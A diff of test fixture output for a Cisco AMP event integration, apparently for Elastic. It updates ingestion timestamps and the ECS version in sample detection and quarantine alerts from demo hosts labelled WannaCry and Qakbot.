@@ -760,7 +760,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094031077Z", + "ingested": "2021-09-13T18:07:42.929479867Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -813,7 +813,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -833,7 +833,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094032961Z", + "ingested": "2021-09-13T18:07:42.929481750Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -884,7 +884,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -904,7 +904,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094035008Z", + "ingested": "2021-09-13T18:07:42.929483818Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -955,7 +955,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -975,7 +975,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094036925Z", + "ingested": "2021-09-13T18:07:42.929485735Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -1028,7 +1028,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1058,7 +1058,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094038843Z", + "ingested": "2021-09-13T18:07:42.929487600Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1124,7 +1124,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1156,7 +1156,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094040732Z", + "ingested": "2021-09-13T18:07:42.929489505Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "kind": "alert", "action": 
"Threat Detected", @@ -1224,7 +1224,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1256,7 +1256,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094042624Z", + "ingested": "2021-09-13T18:07:42.929491390Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -1324,7 +1324,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1354,7 +1354,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094044602Z", + "ingested": "2021-09-13T18:07:42.929493387Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -1424,7 +1424,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1456,7 +1456,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094046511Z", + "ingested": "2021-09-13T18:07:42.929495259Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -1513,7 +1513,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1533,7 +1533,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094048415Z", + "ingested": "2021-09-13T18:07:42.929497150Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1588,7 +1588,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1608,7 +1608,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094050302Z", + "ingested": "2021-09-13T18:07:42.929499044Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1663,7 +1663,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1683,7 +1683,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094052189Z", + "ingested": "2021-09-13T18:07:42.929500941Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -1736,7 +1736,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1760,7 +1760,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094054051Z", + "ingested": "2021-09-13T18:07:42.929502829Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1815,7 +1815,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1839,7 +1839,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094055941Z", + "ingested": "2021-09-13T18:07:42.929504723Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1896,7 +1896,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1922,7 +1922,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094057915Z", + "ingested": "2021-09-13T18:07:42.929506709Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -1982,7 +1982,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
